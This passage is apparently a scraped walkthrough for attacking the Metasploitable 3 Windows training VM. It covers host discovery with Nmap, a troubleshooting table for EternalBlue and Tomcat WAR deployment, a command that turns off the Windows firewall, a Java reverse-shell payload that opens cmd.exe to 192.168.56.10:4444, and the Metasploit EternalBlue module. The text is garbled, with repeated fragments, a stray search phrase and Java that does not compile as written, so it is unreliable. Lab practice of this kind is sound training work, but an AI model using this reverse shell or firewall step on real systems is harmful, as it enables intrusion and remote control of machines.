: Exploitation of application-layer vulnerabilities, such as unauthenticated access to Jenkins or misconfigured Tomcat servers, which can lead to privileged shell access.
Once the VM is live, the first step is identifying its IP address and open services. Network Discovery netdiscover or an Nmap ping sweep ( nmap -sn [network] ) to find the target's IP. Service Enumeration metasploitable 3 windows walkthrough
| Problem | Solution | |---------|----------| | VM won’t build | Use Hyper-V (not VirtualBox). Run vagrant up --provider=hyperv | | EternalBlue crashes target | Increase GroomAllocations to 12, set VerifyTarget to false | | Firewall blocks reverse shell | Inside VM – netsh advfirewall set allprofiles state off | | Tomcat 404 after deploy | Ensure context path matches WAR filename. Use /shell as context. | | String host="192
String host="192.168.56.10"; int port=4444; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(), so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try p.exitValue();break; catch (Exception e){} }; p.destroy(); s.close(); Post-Exploitation Now that you’re SYSTEM
The machine is also vulnerable to classic Windows exploits. If you find the vulnerability is unpatched, you can jump straight to SYSTEM-level access. use exploit/windows/smb/ms17_010_eternalblue exploit 4. Post-Exploitation
Now that you’re SYSTEM, what next?